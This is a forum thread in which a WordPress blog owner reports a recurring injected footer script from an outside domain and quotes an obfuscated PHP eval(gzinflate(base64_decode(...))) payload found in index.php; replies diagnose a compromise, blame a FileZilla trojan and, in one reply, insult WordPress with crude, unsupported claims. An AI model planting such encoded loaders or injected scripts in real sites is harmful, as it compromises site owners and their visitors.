Recently (last 2 weeks) this line of code appeared in the footer of a wordpress blog :
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put that here. I have no idea about what it does ; but I want it out.
For my first try, I just replaced the template and it was gone for a few minutes. But it came back.
So i got to my index.php file (not the template, the very first index.php) and found that code :
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible ? I’m a newbie about viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven’t haven’t updated your software in quite some time and multiple hackers have exploited some well known vulnerability in your software.
How do you fix it? Scorched earth… You have been hacked by many bots, and probably sold online like some kind of whore. Delete your entire web root and start from scratch. Make sure you have the latest versions of every plugin and WordPress.
For the record WordPress was written by monkeys or children or children monkeys… Regardless it is by far one of the worst application I have ever hacked. They are probably still using your password hash as the session id, which means they don’t even understand the basics of why you should hash passwords.
Oah if you keep getting hacked, higher a professional.
Problem solved, wordpress is not responsible for it.
There’s a trojan that infect filezilla and when you open it, it’ll inject code in every pages it can reach via filezilla.
This is really a big deal and 3 antiviruses could not even find it.
If you see that, format your computer.